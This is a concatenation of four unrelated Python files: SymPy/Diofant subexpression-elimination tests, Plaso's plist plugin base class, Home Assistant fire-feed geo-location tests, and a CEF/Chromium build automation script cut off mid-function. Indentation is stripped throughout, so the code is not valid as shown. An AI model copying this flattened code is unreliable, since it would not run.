B = Function('B')
G = Function('G')
t = Tuple(*
(a, a + Rational(1, 2), 2*a, b, 2*a - b + 1, (sqrt(z)/2)**(-2*a + 1)*B(2*a -
b, sqrt(z))*B(b - 1, sqrt(z))*G(b)*G(2*a - b + 1),
sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b,
sqrt(z))*G(b)*G(2*a - b + 1), sqrt(z)*(sqrt(z)/2)**(-2*a + 1)*B(b - 1,
sqrt(z))*B(2*a - b + 1, sqrt(z))*G(b)*G(2*a - b + 1),
(sqrt(z)/2)**(-2*a + 1)*B(b, sqrt(z))*B(2*a - b + 1,
sqrt(z))*G(b)*G(2*a - b + 1), 1, 0, Rational(1, 2), z/2, -b + 1, -2*a + b,
-2*a))
c = cse(t)
ans = (
[(x0, 2*a), (x1, -b), (x2, x1 + 1), (x3, x0 + x2), (x4, sqrt(z)), (x5,
B(x0 + x1, x4)), (x6, G(b)), (x7, G(x3)), (x8, -x0), (x9,
(x4/2)**(x8 + 1)), (x10, x6*x7*x9*B(b - 1, x4)), (x11, x6*x7*x9*B(b,
x4)), (x12, B(x3, x4))], [(a, a + Rational(1, 2), x0, b, x3, x10*x5,
x11*x4*x5, x10*x12*x4, x11*x12, 1, 0, Rational(1, 2), z/2, x2, b + x8, x8)])
assert ans == c
def test_sympyissue_6169():
r = RootOf(x**6 - 4*x**5 - 2, 1)
assert cse(r) == ([], [r])
# and a check that the right thing is done with the new
# mechanism
assert sub_post(sub_pre((-x - y)*z - x - y)) == -z*(x + y) - x - y
def test_cse_Indexed():
len_y = 5
y = IndexedBase('y', shape=(len_y,))
x = IndexedBase('x', shape=(len_y,))
i = Idx('i', len_y-1)
expr1 = (y[i+1]-y[i])/(x[i+1]-x[i])
expr2 = 1/(x[i+1]-x[i])
replacements, _ = cse([expr1, expr2])
assert len(replacements) > 0
@pytest.mark.xfail
def test_cse_MatrixSymbol():
A = MatrixSymbol('A', 3, 3)
y = MatrixSymbol('y', 3, 1)
expr1 = (A.T*A).inverse() * A * y
expr2 = (A.T*A) * A * y
replacements, _ = cse([expr1, expr2])
assert len(replacements) > 0
def test_Piecewise():
f = Piecewise((-z + x*y, Eq(y, 0)), (-z - x*y, True))
ans = cse(f)
actual_ans = ([(x0, -z), (x1, x*y)], [Piecewise((x0+x1, Eq(y, 0)), (x0 - x1, True))])
assert ans == actual_ans
def test_ignore_order_terms():
eq = exp(x).series(x, 0, 3) + sin(y + x**3) - 1
assert cse(eq) == ([], [sin(x**3 + y) + x + x**2/2 + O(x**3)])
def test_name_conflict():
z1 = x0 + y
z2 = x2 + x3
l = [cos(z1) + z1, cos(z2) + z2, x0 + x2]
substs, reduced = cse(l)
assert [e.subs(reversed(substs)) for e in reduced] == l
def test_name_conflict_cust_symbols():
z1 = x0 + y
z2 = x2 + x3
l = [cos(z1) + z1, cos(z2) + z2, x0 + x2]
substs, reduced = cse(l, symbols('x:10'))
assert [e.subs(reversed(substs)) for e in reduced] == l
def test_symbols_exhausted_error():
l = cos(x+y)+x+y+cos(w+y)+sin(w+y)
sym = [x, y, z]
with pytest.raises(ValueError):
cse(l, symbols=sym)
def test_sympyissue_7840():
# daveknippers' example
C393 = sympify(
'Piecewise((C391 - 1.65, C390 < 0.5), (Piecewise((C391 - 1.65, \
C391 > 2.35), (C392, True)), True))'
)
C391 = sympify(
'Piecewise((2.05*C390**(-1.03), C390 < 0.5), (2.5*C390**(-0.625), True))'
)
C393 = C393.subs({'C391': C391})
# simple substitution
sub = {}
sub['C390'] = 0.703451854
sub['C392'] = 1.01417794
ss_answer = C393.subs(sub)
# cse
substitutions, new_eqn = cse(C393)
for pair in substitutions:
sub[pair[0].name] = pair[1].subs(sub)
cse_answer = new_eqn[0].subs(sub)
# both methods should be the same
assert ss_answer == cse_answer
# GitRay's example
expr = Piecewise((Symbol('ON'), Eq(Symbol('mode'), Symbol('ON'))),
(Piecewise((Piecewise((Symbol('OFF'), Symbol('x') < Symbol('threshold')),
(Symbol('ON'), true)), Eq(Symbol('mode'), Symbol('AUTO'))),
(Symbol('OFF'), true)), true))
substitutions, new_eqn = cse(expr)
# this Piecewise should be exactly the same
assert new_eqn[0] == expr
# there should not be any replacements
assert len(substitutions) < 1
def test_matrices():
# issue sympy/sympy#8891
for cls in (MutableDenseMatrix, MutableSparseMatrix,
ImmutableDenseMatrix, ImmutableSparseMatrix):
m = cls(2, 2, [x + y, 0, 0, 0])
res = cse([x + y, m])
ans = ([(x0, x + y)], [x0, cls([[x0, 0], [0, 0]])])
assert res == ans
assert isinstance(res[1][-1], cls)
def test_cse_ignore():
exprs = [exp(y)*(3*y + 3*sqrt(x+1)), exp(y)*(5*y + 5*sqrt(x+1))]
subst1, _ = cse(exprs)
assert any(y in sub.free_symbols for _, sub in subst1), 'cse failed to identify any term with y'
subst2, _ = cse(exprs, ignore=(y,)) # y is not allowed in substitutions
assert not any(y in sub.free_symbols for _, sub in subst2), 'Sub-expressions containing y must be ignored'
assert any(sub - sqrt(x + 1) == 0 for _, sub in subst2), 'cse failed to identify sqrt(x + 1) as sub-expression'
| |
# -*- coding: utf-8 -*-
"""Plist_interface contains basic interface for plist plugins within Plaso.
Plist files are only one example of a type of object that the Plaso tool is
expected to encounter and process. There can be and are many other parsers
which are designed to process specific data types.
PlistPlugin defines the attributes necessary for registration, discovery
and operation of plugins for plist files which will be used by PlistParser.
"""
import abc
import logging
from plaso.lib import errors
from plaso.parsers import plugins
class PlistPlugin(plugins.BasePlugin):
"""This is an abstract class from which plugins should be based.
The following are the attributes and methods expected to be overridden by a
plugin.
Attributes:
PLIST_PATH - string of the filename the plugin is designed to process.
PLIST_KEY - list of keys holding values that are necessary for processing.
Please note, PLIST_KEY is cAse sensitive and for a plugin to match a
plist file needs to contain at minimum the number of keys needed for
processing or WrongPlistPlugin is raised.
For example if a Plist file contains the following keys,
{'foo': 1, 'bar': 2, 'opt': 3} with 'foo' and 'bar' being keys critical to
processing define PLIST_KEY as ['foo', 'bar']. If 'opt' is only optionally
defined it can still be accessed by manually processing self.top_level from
the plugin.
Methods:
GetEntries() - extract and format info from keys and yields event.PlistEvent.
"""
NAME = u'plist_plugin'
# PLIST_PATH is a string for the filename this parser is designed to process.
# This is expected to be overriden by the processing plugin.
# Ex. 'com.apple.bluetooth.plist'
PLIST_PATH = u'any'
# PLIST_KEYS is a list of keys required by a plugin.
# This is expected to be overriden by the processing plugin.
# Ex. frozenset(['DeviceCache', 'PairedDevices'])
PLIST_KEYS = frozenset([u'any'])
# This is expected to be overriden by the processing plugin.
# URLS should contain a list of URLs with additional information about
# this key or value.
# Ex. ['http://www.forensicswiki.org/wiki/Property_list_(plist)']
URLS = []
def _GetKeys(self, top_level, keys, depth=1):
"""Helper function to return keys nested in a plist dict.
By default this function will return the values for the named keys requested
by a plugin in match dictionary object. The default setting is to look
a single layer down from the root (same as the check for plugin
applicability). This level is suitable for most cases.
For cases where there is variability in the name at the first level
(e.g. it is the MAC addresses of a device, or a UUID) it is possible to
override the depth limit and use GetKeys to fetch from a deeper level.
E.g.
Top_Level (root): # depth = 0
-- Key_Name_is_UUID_Generated_At_Install 1234-5678-8 # depth = 1
---- Interesting_SubKey_with_value_to_Process: [Values, ...] # depth = 2
Args:
top_level: Plist in dictionary form.
keys: A list of keys that should be returned.
depth: Defines how many levels deep to check for a match.
Returns:
A dictionary with just the keys requested or an empty dict if the plist
is flat, eg. top_level is a list instead of a dict object.
"""
match = {}
if not isinstance(top_level, dict):
# Return an empty dict here if top_level is a list object, which happens
# if the plist file is flat.
return match
keys = set(keys)
if depth == 1:
for key in keys:
match[key] = top_level.get(key, None)
else:
for _, parsed_key, parsed_value in RecurseKey(top_level, depth=depth):
if parsed_key in keys:
match[parsed_key] = parsed_value
if set(match.keys()) == keys:
return match
return match
@abc.abstractmethod
def GetEntries(
self, parser_mediator, top_level=None, match=None, **unused_kwargs):
"""Extracts event objects from the values of entries within a plist.
This is the main method that a plist plugin needs to implement.
The contents of the plist keys defined in PLIST_KEYS will be made available
to the plugin as self.matched{'KEY': 'value'}. The plugin should implement
logic to parse this into a useful event for incorporation into the Plaso
timeline.
For example if you want to note the timestamps of when devices were
LastInquiryUpdated you would need to examine the bluetooth config file
called 'com.apple.bluetooth' and need to look at devices under the key
'DeviceCache'. To do this the plugin needs to define
PLIST_PATH = 'com.apple.bluetooth' and PLIST_KEYS =
frozenset(['DeviceCache']). IMPORTANT: this interface requires exact names
and is case sensitive. A unit test based on a real world file is expected
for each plist plugin.
When a file with this key is encountered during processing self.matched is
populated and the plugin's GetEntries() is called. The plugin would have
self.matched = {'DeviceCache': [{'DE:AD:BE:EF:01': {'LastInquiryUpdate':
DateTime_Object}, 'DE:AD:BE:EF:01': {'LastInquiryUpdate':
DateTime_Object}'...}]} and needs to implement logic here to extract
values, format, and produce the data as a event.PlistEvent.
The attributes for a PlistEvent should include the following:
root = Root key this event was extracted from. E.g. DeviceCache/
key = Key the value resided in. E.g. 'DE:AD:BE:EF:01'
time = Date this artifact was created in number of micro seconds
(usec) since January 1, 1970, 00:00:00 UTC.
desc = Short description. E.g. 'Device LastInquiryUpdated'
See plist/bluetooth.py for the implemented example plugin.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
top_level: Optional plist in dictionary form. The default is None.
match: Optional dictionary containing extracted keys from PLIST_KEYS.
The default is None.
"""
# pylint: disable=arguments-differ
def Process(self, parser_mediator, plist_name, top_level, **kwargs):
"""Determine if this is the correct plugin; if so proceed with processing.
Process() checks if the current plist being processed is a match for a
plugin by comparing the PATH and KEY requirements defined by a plugin. If
both match processing continues; else raise WrongPlistPlugin.
This function also extracts the required keys as defined in self.PLIST_KEYS
from the plist and stores the result in self.match[key] and calls
self.GetEntries() which holds the processing logic implemented by the
plugin.
Args:
parser_mediator: A parser mediator object (instance of ParserMediator).
plist_name: Name of the plist file.
top_level: Plist in dictionary form.
Raises:
WrongPlistPlugin: If this plugin is not able to process the given file.
ValueError: If top_level or plist_name are not set.
"""
if plist_name is None or top_level is None:
raise ValueError(u'Top level or plist name are not set.')
if plist_name.lower() != self.PLIST_PATH.lower():
raise errors.WrongPlistPlugin(self.NAME, plist_name)
if isinstance(top_level, dict):
if not set(top_level.keys()).issuperset(self.PLIST_KEYS):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
else:
# Make sure we are getting back an object that has an iterator.
if not hasattr(top_level, u'__iter__'):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
# This is a list and we need to just look at the first level
# of keys there.
keys = []
for top_level_entry in top_level:
if isinstance(top_level_entry, dict):
keys.extend(top_level_entry.keys())
# Compare this is a set, which removes possible duplicate entries
# in the list.
if not set(keys).issuperset(self.PLIST_KEYS):
raise errors.WrongPlistPlugin(self.NAME, plist_name)
# This will raise if unhandled keyword arguments are passed.
super(PlistPlugin, self).Process(parser_mediator)
logging.debug(u'Plist Plugin Used: {0:s} for: {1:s}'.format(
self.NAME, plist_name))
match = self._GetKeys(top_level, self.PLIST_KEYS)
self.GetEntries(parser_mediator, top_level=top_level, match=match)
# TODO: move to lib.plist.
def RecurseKey(recur_item, depth=15, key_path=u''):
"""Flattens nested dictionaries and lists by yielding it's values.
The hierarchy of a plist file is a series of nested dictionaries and lists.
This is a helper function helps plugins navigate the structure without
having to reimplement their own recursive methods.
This method implements an overridable depth limit to prevent processing
extremely deeply nested plists. If the limit is reached a debug message is
logged indicating which key processing stopped on.
Example Input Plist:
recur_item = { DeviceRoot: { DeviceMAC1: [Value1, Value2, Value3],
DeviceMAC2: [Value1, Value2, Value3]}}
Example Output:
('', DeviceRoot, {DeviceMACs...})
(DeviceRoot, DeviceMAC1, [Value1, Value2, Value3])
(DeviceRoot, DeviceMAC2, [Value1, Value2, Value3])
Args:
recur_item: An object to be checked for additional nested items.
depth: Optional integer indication the current recursion depth.
This value is used to ensure we stop at the maximum recursion depth.
The default is 15.
key_path: Optional path of the current working key. The default is
an emtpy string.
Yields:
A tuple of the key path, key, and value from a plist.
"""
if depth < 1:
logging.debug(u'Recursion limit hit for key: {0:s}'.format(key_path))
return
if isinstance(recur_item, (list, tuple)):
for recur in recur_item:
for key in RecurseKey(recur, depth=depth, key_path=key_path):
yield key
return
if not hasattr(recur_item, u'iteritems'):
return
# TODO determine if recur_item is a plistlib._InternalDict to determine
# if recur_item.iteritems() should be replaced with iter(recur_item.items()).
# Note that testing breaks when explictly only allowing
# plistlib._InternalDict.
for subkey, value in recur_item.iteritems():
yield key_path, subkey, value
if isinstance(value, dict):
value = [value]
if isinstance(value, list):
for item in value:
if not isinstance(item, dict):
continue
subkey_path = u'{0:s}/{1:s}'.format(key_path, subkey)
for tuple_value in RecurseKey(
item, depth=depth - 1, key_path=subkey_path):
yield tuple_value
| |
"""The tests for the geojson platform."""
import datetime
from asynctest.mock import patch, MagicMock, call
from homeassistant.components import geo_location
from homeassistant.components.geo_location import ATTR_SOURCE
from homeassistant.components.nsw_rural_fire_service_feed.geo_location import (
ATTR_EXTERNAL_ID,
SCAN_INTERVAL,
ATTR_CATEGORY,
ATTR_FIRE,
ATTR_LOCATION,
ATTR_COUNCIL_AREA,
ATTR_STATUS,
ATTR_TYPE,
ATTR_SIZE,
ATTR_RESPONSIBLE_AGENCY,
ATTR_PUBLICATION_DATE,
)
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_FRIENDLY_NAME,
ATTR_LATITUDE,
ATTR_LONGITUDE,
ATTR_UNIT_OF_MEASUREMENT,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
EVENT_HOMEASSISTANT_START,
ATTR_ICON,
)
from homeassistant.setup import async_setup_component
from tests.common import assert_setup_component, async_fire_time_changed
import homeassistant.util.dt as dt_util
CONFIG = {
geo_location.DOMAIN: [{"platform": "nsw_rural_fire_service_feed", CONF_RADIUS: 200}]
}
CONFIG_WITH_CUSTOM_LOCATION = {
geo_location.DOMAIN: [
{
"platform": "nsw_rural_fire_service_feed",
CONF_RADIUS: 200,
CONF_LATITUDE: 15.1,
CONF_LONGITUDE: 25.2,
}
]
}
def _generate_mock_feed_entry(
external_id,
title,
distance_to_home,
coordinates,
category=None,
location=None,
attribution=None,
publication_date=None,
council_area=None,
status=None,
entry_type=None,
fire=True,
size=None,
responsible_agency=None,
):
"""Construct a mock feed entry for testing purposes."""
feed_entry = MagicMock()
feed_entry.external_id = external_id
feed_entry.title = title
feed_entry.distance_to_home = distance_to_home
feed_entry.coordinates = coordinates
feed_entry.category = category
feed_entry.location = location
feed_entry.attribution = attribution
feed_entry.publication_date = publication_date
feed_entry.council_area = council_area
feed_entry.status = status
feed_entry.type = entry_type
feed_entry.fire = fire
feed_entry.size = size
feed_entry.responsible_agency = responsible_agency
return feed_entry
async def test_setup(hass):
"""Test the general setup of the platform."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry(
"1234",
"Title 1",
15.5,
(-31.0, 150.0),
category="Category 1",
location="Location 1",
attribution="Attribution 1",
publication_date=datetime.datetime(
2018, 9, 22, 8, 0, tzinfo=datetime.timezone.utc
),
council_area="Council Area 1",
status="Status 1",
entry_type="Type 1",
size="Size 1",
responsible_agency="Agency 1",
)
mock_entry_2 = _generate_mock_feed_entry(
"2345", "Title 2", 20.5, (-31.1, 150.1), fire=False
)
mock_entry_3 = _generate_mock_feed_entry("3456", "Title 3", 25.5, (-31.2, 150.2))
mock_entry_4 = _generate_mock_feed_entry("4567", "Title 4", 12.5, (-31.3, 150.3))
utcnow = dt_util.utcnow()
# Patching 'utcnow' to gain more control over the timed update.
with patch("homeassistant.util.dt.utcnow", return_value=utcnow), patch(
"geojson_client.nsw_rural_fire_service_feed." "NswRuralFireServiceFeed"
) as mock_feed:
mock_feed.return_value.update.return_value = (
"OK",
[mock_entry_1, mock_entry_2, mock_entry_3],
)
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(hass, geo_location.DOMAIN, CONFIG)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
state = hass.states.get("geo_location.title_1")
assert state is not None
assert state.name == "Title 1"
assert state.attributes == {
ATTR_EXTERNAL_ID: "1234",
ATTR_LATITUDE: -31.0,
ATTR_LONGITUDE: 150.0,
ATTR_FRIENDLY_NAME: "Title 1",
ATTR_CATEGORY: "Category 1",
ATTR_LOCATION: "Location 1",
ATTR_ATTRIBUTION: "Attribution 1",
ATTR_PUBLICATION_DATE: datetime.datetime(
2018, 9, 22, 8, 0, tzinfo=datetime.timezone.utc
),
ATTR_FIRE: True,
ATTR_COUNCIL_AREA: "Council Area 1",
ATTR_STATUS: "Status 1",
ATTR_TYPE: "Type 1",
ATTR_SIZE: "Size 1",
ATTR_RESPONSIBLE_AGENCY: "Agency 1",
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:fire",
}
assert round(abs(float(state.state) - 15.5), 7) == 0
state = hass.states.get("geo_location.title_2")
assert state is not None
assert state.name == "Title 2"
assert state.attributes == {
ATTR_EXTERNAL_ID: "2345",
ATTR_LATITUDE: -31.1,
ATTR_LONGITUDE: 150.1,
ATTR_FRIENDLY_NAME: "Title 2",
ATTR_FIRE: False,
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:alarm-light",
}
assert round(abs(float(state.state) - 20.5), 7) == 0
state = hass.states.get("geo_location.title_3")
assert state is not None
assert state.name == "Title 3"
assert state.attributes == {
ATTR_EXTERNAL_ID: "3456",
ATTR_LATITUDE: -31.2,
ATTR_LONGITUDE: 150.2,
ATTR_FRIENDLY_NAME: "Title 3",
ATTR_FIRE: True,
ATTR_UNIT_OF_MEASUREMENT: "km",
ATTR_SOURCE: "nsw_rural_fire_service_feed",
ATTR_ICON: "mdi:fire",
}
assert round(abs(float(state.state) - 25.5), 7) == 0
# Simulate an update - one existing, one new entry,
# one outdated entry
mock_feed.return_value.update.return_value = (
"OK",
[mock_entry_1, mock_entry_4, mock_entry_3],
)
async_fire_time_changed(hass, utcnow + SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an update - empty data, but successful update,
# so no changes to entities.
mock_feed.return_value.update.return_value = "OK_NO_DATA", None
async_fire_time_changed(hass, utcnow + 2 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 3
# Simulate an update - empty data, removes all entities
mock_feed.return_value.update.return_value = "ERROR", None
async_fire_time_changed(hass, utcnow + 3 * SCAN_INTERVAL)
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 0
async def test_setup_with_custom_location(hass):
"""Test the setup with a custom location."""
# Set up some mock feed entries for this test.
mock_entry_1 = _generate_mock_feed_entry("1234", "Title 1", 20.5, (-31.1, 150.1))
with patch(
"geojson_client.nsw_rural_fire_service_feed." "NswRuralFireServiceFeed"
) as mock_feed:
mock_feed.return_value.update.return_value = "OK", [mock_entry_1]
with assert_setup_component(1, geo_location.DOMAIN):
assert await async_setup_component(
hass, geo_location.DOMAIN, CONFIG_WITH_CUSTOM_LOCATION
)
# Artificially trigger update.
hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
# Collect events.
await hass.async_block_till_done()
all_states = hass.states.async_all()
assert len(all_states) == 1
assert mock_feed.call_args == call(
(15.1, 25.2), filter_categories=[], filter_radius=200.0
)
| |
# Copyright (c) 2012 The Chromium Embedded Framework Authors. All rights
# reserved. Use of this source code is governed by a BSD-style license that
# can be found in the LICENSE file.
from optparse import OptionParser
from subprocess import Popen, PIPE, STDOUT
from tempfile import mktemp
import os
import shlex
import shutil
import sys
import urllib
# default URL values
chromium_url = 'http://git.chromium.org/chromium/src.git'
depot_tools_url = 'http://src.chromium.org/svn/trunk/tools/depot_tools'
def check_url(url):
""" Check the URL and raise an exception if invalid. """
if ':' in url[:7]:
parts = url.split(':', 1)
if (parts[0] in ["http", "https", "git"] and \
parts[1] == urllib.quote(parts[1])):
return url
sys.stderr.write('Invalid URL: '+url+"\n")
raise Exception('Invalid URL: '+url)
def get_exec_environ():
env = os.environ
env['PATH'] = depot_tools_dir + os.pathsep + env['PATH']
return env
def run(args, **kwargs):
'''Run a command and capture the output iteratively'''
if isinstance(args, str):
args = shlex.split(args.replace('\\', '\\\\'))
cwd = kwargs.get("cwd", os.getcwd())
quiet = kwargs.get("quiet", False)
print "-> Running '%s' in %s" % (" ".join(args), os.path.relpath(cwd))
cmd = Popen(args, cwd=cwd, stdout=PIPE, stderr=STDOUT,
env=kwargs.get("env", get_exec_environ()),
shell=(sys.platform == 'win32'))
output = ''
while True:
out = cmd.stdout.read(1)
if out == '' and cmd.poll() != None:
break
output += out
if not quiet:
sys.stdout.write(out)
if cmd.wait() != 0:
raise Exception("Command failed: \"%s\"" % " ".join(args), output)
return output
def get_current_branch(path):
return run("git rev-parse --abbrev-ref HEAD", cwd=path, quiet=True)
def get_chromium_compat_rev(cef_url, path, cef_rev):
if not os.path.isdir(path):
path = mktemp()
run("git clone --depth 1 %s %s" % (cef_url, path), quiet = True)
if cef_rev == "None":
cef_rev = get_git_rev(path, get_current_branch(path))
compat_cmd = "git cat-file -p %s:CHROMIUM_BUILD_COMPATIBILITY.txt" % cef_rev
compat_value = run(compat_cmd, cwd = path, quiet = True)
config = eval(compat_value, {'__builtins__': None}, None)
if not 'chromium_revision' in config:
raise Exception("Missing chromium_revision value")
return str(int(config['chromium_revision']))
def get_svn_rev(path, branch):
svn_rev = "None"
cmd = ("git log --grep=^git-svn-id: -n 1 %s" % branch).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
for line in process.stdout:
if line.find("git-svn-id") > 0:
svn_rev = line.split("@")[1].split()[0]
break
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return svn_rev
def get_git_rev_for_svn_rvn(path, svn_rev):
git_rev = "None"
cmd = ("git log --grep=^git-svn-id:.*@%s --oneline" % svn_rev).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
git_rev = process.communicate()[0].split()[0]
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_rev
def get_git_rev(path, branch):
git_rev = "None"
cmd = ("git describe --always %s" % branch).split()
try:
process = Popen(cmd, cwd=path, stdout = PIPE, stderr = PIPE)
git_rev = process.communicate()[0].strip()
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_rev
def get_git_origin(path):
git_origin = "None"
get_origin_cmd = "git remote show origin -n".split()
try:
process = Popen(get_origin_cmd, cwd=path, stdout = PIPE, stderr = PIPE)
for line in process.stdout:
if line.startswith(" Fetch URL: "):
git_origin = line.replace(" Fetch URL: ", "").strip()
break
except IOError, (errno, strerror):
sys.stderr.write('Failed to read git log: ' + strerror + "\n")
raise
return git_origin
def get_checkout_info(path, fetch_latest = True):
""" Retrieves the origin URL, git HEAD revision and last SVN revision """
url = 'None'
origin_svn_rev = 'None'
origin_git_rev = 'None'
local_svn_rev = 'None'
local_git_rev = 'None'
if os.path.isdir(path):
if fetch_latest:
run("git fetch", cwd = path, quiet = True)
url = get_git_origin(path)
branch = get_current_branch(path)
origin_svn_rev = get_svn_rev(path, "origin/%s" % branch)
origin_git_rev = get_git_rev(path, "origin/%s" % branch)
local_svn_rev = get_svn_rev(path, branch)
local_git_rev = get_git_rev(path, branch)
return {
'url' : url,
'local' : {
'svn-revision' : local_svn_rev,
'git-revision' : local_git_rev
},
'origin' : {
'svn-revision' : origin_svn_rev,
'git-revision' : origin_git_rev
}
}
def onerror(func, path, exc_info):
"""
Error handler for ``shutil.rmtree``.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : ``shutil.rmtree(path, onerror=onerror)``
"""
import stat
if not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
# cannot be loaded as a module
if __name__ != "__main__":
sys.stderr.write('This file cannot be loaded as a module!')
sys.exit()
# parse command-line options
desc = """
This utility implements automation for the download, update, build and
distribution of CEF.
"""
parser = OptionParser(description=desc)
parser.add_option('--url', dest='url',
help='CEF source URL')
parser.add_option('--download-dir', dest='downloaddir', metavar='DIR',
help='download directory with no spaces [required]')
parser.add_option('--revision', dest='revision',
help='CEF source revision')
parser.add_option('--force-config',
action='store_true', dest='forceconfig', default=False,
help='force Chromium configuration')
parser.add_option('--force-clean',
action='store_true', dest='forceclean', default=False,
help='force revert of all Chromium changes, deletion of '+\
'all unversioned files including the CEF folder and '+\
'trigger the force-update, force-build and '+\
'force-distrib options')
parser.add_option('--force-update',
action='store_true', dest='forceupdate', default=False,
help='force Chromium and CEF update')
parser.add_option('--force-build',
action='store_true', dest='forcebuild', default=False,
help='force CEF debug and release builds')
parser.add_option('--force-distrib',
action='store_true', dest='forcedistrib', default=False,
help='force creation of CEF binary distribution')
parser.add_option('--no-debug-build',
action='store_true', dest='nodebugbuild', default=False,
help="don't perform the CEF debug build")
parser.add_option('--no-release-build',
action='store_true', dest='noreleasebuild', default=False,
help="don't perform the CEF release build")
parser.add_option('--no-distrib',
action='store_true', dest='nodistrib', default=False,
help="don't create the CEF binary distribution")
(options, args) = parser.parse_args()
# the downloaddir and url options are required
if options.downloaddir is None:
print "ERROR: Download directory is required"
parser.print_help(sys.stderr)
sys.exit()
if options.url is None:
print "ERROR: CEF URL is required"
parser.print_help(sys.stderr)
sys.exit()
cef_url = check_url(options.url)
download_dir = os.path.abspath(options.downloaddir)
if not os.path.exists(download_dir):
# create the download directory
os.makedirs(download_dir)
# Test the operating system.
platform = '';
if sys.platform == 'win32':
platform = 'windows'
elif sys.platform == 'darwin':
platform = 'macosx'
elif sys.platform.startswith('linux'):
platform = 'linux'
# set the expected script extension
if platform == 'windows':
script_ext = '.bat'
else:
script_ext = '.sh'
# check if the "depot_tools" directory exists
depot_tools_dir = os.path.join(download_dir, 'depot_tools')
if not os.path.exists(depot_tools_dir):
# checkout depot_tools
run('svn checkout %s %s' % (depot_tools_url, depot_tools_dir),
cwd = download_dir, quiet = True)
chromium_dir = os.path.join(download_dir, 'chromium')
if not os.path.exists(chromium_dir):
# create the "chromium" directory
os.makedirs(chromium_dir)
chromium_src_dir = os.path.join(chromium_dir, 'src')
cef_src_dir = os.path.join(chromium_src_dir, 'cef')
cef_tools_dir = os.path.join(cef_src_dir, 'tools')
# retrieve the current CEF URL and revision
info = get_checkout_info(cef_src_dir)
cef_rev = info['origin']['git-revision']
if not options.revision is None:
cef_rev = str(options.revision)
current_cef_url = info['url']
current_cef_rev = info['local']['git-revision']
# retrieve the compatible Chromium revision
chromium_rev = get_chromium_compat_rev(cef_url, cef_src_dir, cef_rev)
# retrieve the current Chromium URL and revision
info = get_checkout_info(chromium_src_dir, False)
current_chromium_url = info['url']
current_chromium_rev = info['local']['svn-revision']
# test if the CEF URL changed
cef_url_changed = current_cef_url != cef_url
print "-- CEF URL: %s" % current_cef_url
if cef_url_changed:
print "\t-> CHANGED TO: %s" % cef_url
# test if the CEF revision changed
cef_rev_changed = current_cef_rev != cef_rev
print "-- CEF Revision: %s" % current_cef_rev
if cef_url_changed:
print "\t-> CHANGED TO: %s" % cef_rev
# test if the Chromium URL changed
chromium_url_changed = current_chromium_url != chromium_url
print "-- Chromium URL: %s" % current_chromium_url
if cef_url_changed:
print "\t-> CHANGED TO: %s" % chromium_url
# test if the Chromium revision changed
chromium_rev_changed = current_chromium_rev != chromium_rev
print "-- Chromium Revision: %s" % current_chromium_rev
if cef_url_changed:
print "\t-> CHANGED TO: %s" % chromium_rev
# true if anything changed
any_changed = chromium_url_changed or chromium_rev_changed or \
cef_url_changed or cef_rev_changed
if not any_changed:
print "*** NO CHANGE ***"
if chromium_url_changed or options.forceconfig:
# run gclient config to create the .gclient file
run('gclient config %s --git-deps' % chromium_url, cwd = chromium_dir)
path = os.path.join(chromium_dir, '.gclient')
if not os.path.exists(path):
raise Exception('.gclient file was not created')
# read the resulting .gclient file
fp = open(path, 'r')
data = fp.read()
fp.close()
# populate "custom_deps" section
data = data.replace('"custom_deps" : {', '"custom_deps" : {'+\
"\n "+'"src/third_party/WebKit/LayoutTests": None,'+\
"\n "+'"src/chrome_frame/tools/test/reference_build/chrome": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_mac": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_win": None,'+\
"\n "+'"src/chrome/tools/test/reference_build/chrome_linux": None,')
# write the new .gclient file
fp = open(path, 'w')
fp.write(data)
fp.close()
if options.forceclean:
if os.path.exists(chromium_src_dir):
# revert all Chromium changes and delete all unversioned files
run('gclient revert -n', cwd = chromium_dir)
# remove the build output directories
output_dirs = []
if platform == 'windows':
output_dirs.append(os.path.join(chromium_src_dir, 'build\\Debug'))
output_dirs.append(os.path.join(chromium_src_dir, 'build\\Release'))
elif platform == 'macosx':
output_dirs.append(os.path.join(chromium_src_dir, 'xcodebuild'))
elif platform == 'linux':
output_dirs.append(os.path.join(chromium_src_dir, 'out'))
for output_dir in output_dirs:
if os.path.exists(output_dir):
shutil.rmtree(output_dir, onerror=onerror)
# force update, build and distrib steps
options.forceupdate = True
options.forcebuild = True
options.forcedistrib = True
if chromium_url_changed or chromium_rev_changed or options.forceupdate:
# download/update the Chromium source cod
fetch_rev = "HEAD"
if os.path.isdir(chromium_src_dir):
fetch_rev = get_git_rev_for_svn_rvn(
chromium_src_dir, current_chromium_rev)
